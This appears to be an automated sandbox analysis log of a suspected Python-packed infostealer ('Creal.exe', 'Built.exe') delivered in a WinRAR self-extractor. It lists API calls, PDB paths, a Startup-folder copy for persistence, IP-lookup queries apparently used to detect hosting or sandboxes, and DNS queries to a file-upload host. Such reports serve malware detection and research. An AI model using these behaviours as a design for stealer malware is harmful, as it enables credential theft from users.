              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF37840 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF37840
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8B660 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF8B660
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF212CB CRYPTO_THREAD_run_once,5_2_00007FFD8AF212CB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF656D0 CRYPTO_free,5_2_00007FFD8AF656D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF21023
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF71750 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF71750
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF77570 CRYPTO_realloc,5_2_00007FFD8AF77570
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF220F4 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF220F4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22469 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF22469
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF221E9 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,5_2_00007FFD8AF221E9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21181 CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF21181
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22379 CRYPTO_free,5_2_00007FFD8AF22379
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,5_2_00007FFD8AF2110E
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF31620 CRYPTO_free,CRYPTO_strndup,5_2_00007FFD8AF31620
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2F650 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF2F650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF93650 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,5_2_00007FFD8AF93650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22126 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF22126
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21393 OSSL_PROVIDER_do_all,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,5_2_00007FFD8AF21393
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF93480 CRYPTO_free,CRYPTO_strndup,5_2_00007FFD8AF93480
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21EDD CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF21EDD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF714E0 CRYPTO_memcmp,5_2_00007FFD8AF714E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21992 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new_ex,OPENSSL_sk_num,X509_VERIFY_PARAM_new,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,5_2_00007FFD8AF21992
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4D510 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,5_2_00007FFD8AF4D510
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF2193D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A265124 i2d_X509,PyBytes_FromStringAndSize,CRYPTO_free,5_2_00007FFD9A265124
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A2653DC ASN1_STRING_type,ASN1_STRING_length,ASN1_STRING_get0_data,Py_BuildValue,ASN1_STRING_to_UTF8,_Py_Dealloc,Py_BuildValue,CRYPTO_free,5_2_00007FFD9A2653DC
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000004.00000002.2174319027.00007FFD9253F000.00000040.00000001.01000000.0000001F.sdmp, Creal.exe, 00000005.00000002.2432361806.00007FFD89E27000.00000002.00000001.01000000.00000032.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: Built.exe, 00000004.00000002.2175008965.00007FFD93A12000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B3A2000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000004.00000002.2211113612.00007FFDA5B81000.00000040.00000001.01000000.00000014.sdmp, Creal.exe, 00000005.00000002.2438100824.00007FFD9F7F3000.00000002.00000001.01000000.0000002B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000004.00000002.2207256705.00007FFDA46E1000.00000040.00000001.01000000.0000000D.sdmp, Creal.exe, 00000005.00000002.2437686483.00007FFD9F3D3000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Creal.exe, 00000002.00000003.2115776871.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Built.exe, Built.exe, 00000004.00000002.2205132237.00007FFDA3AE1000.00000040.00000001.01000000.0000001D.sdmp, Creal.exe, 00000005.00000002.2438752621.00007FFDA3BF6000.00000002.00000001.01000000.00000028.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: Built.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Creal.exe, 00000005.00000002.2437048857.00007FFD9DA42000.00000002.00000001.01000000.00000026.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2208486691.00007FFDA4DA1000.00000040.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2209383720.00007FFDA54BE000.00000040.00000001.01000000.00000010.sdmp, Creal.exe, 00000005.00000002.2438283541.00007FFDA086D000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000000.2087291779.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp, #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, Built.exe, 00000004.00000002.2206641962.00007FFDA4331000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2202084879.00007FFDA35A1000.00000040.00000001.01000000.00000011.sdmp, Creal.exe, 00000005.00000002.2433119716.00007FFD8A1FF000.00000002.00000001.01000000.0000002E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Creal.exe, 00000005.00000002.2417262722.00000203E7250000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000004.00000002.2193375861.00007FFDA33E1000.00000040.00000001.01000000.00000017.sdmp, Creal.exe, 00000005.00000002.2436764632.00007FFD9A26E000.00000002.00000001.01000000.0000002C.sdmp
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60638647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60638647C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063B3130 FindFirstFileExA,0_2_00007FF6063B3130
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9249280 FindFirstFileExW,FindClose,2_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E289280 FindFirstFileExW,FindClose,3_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E289280 FindFirstFileExW,FindClose,4_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9249280 FindFirstFileExW,FindClose,5_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6D9261874
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ifconfig.me
              Source: unknownDNS query: name: api.ipify.org
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49726
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49956
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meUser-Agent: curl/7.83.1Accept: */*
              Source: global trafficDNS traffic detected: DNS query: blank-v1rwt.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: ifconfig.me
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: api.gofile.io
              Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
              Source: Creal.exe, 00000005.00000002.2423537935.00000203E7DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
              Source: Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405762243.00000203E7955000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2406137702.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E7970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: Creal.exe, 00000005.00000003.2376603648.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381741490.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2365364395.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405762243.00000203E7955000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2406137702.00000203E7A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail
              Source: Creal.exe, 00000005.00000003.2413104286.00000203E7AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: Built.exe, 00000004.00000003.2140576878.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D966F30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2167539470.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381479785.00000203E784F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381601278.00000203E7855000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369311620.00000203E7810000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2399794322.00000203E7857000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373069284.00000203E784B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
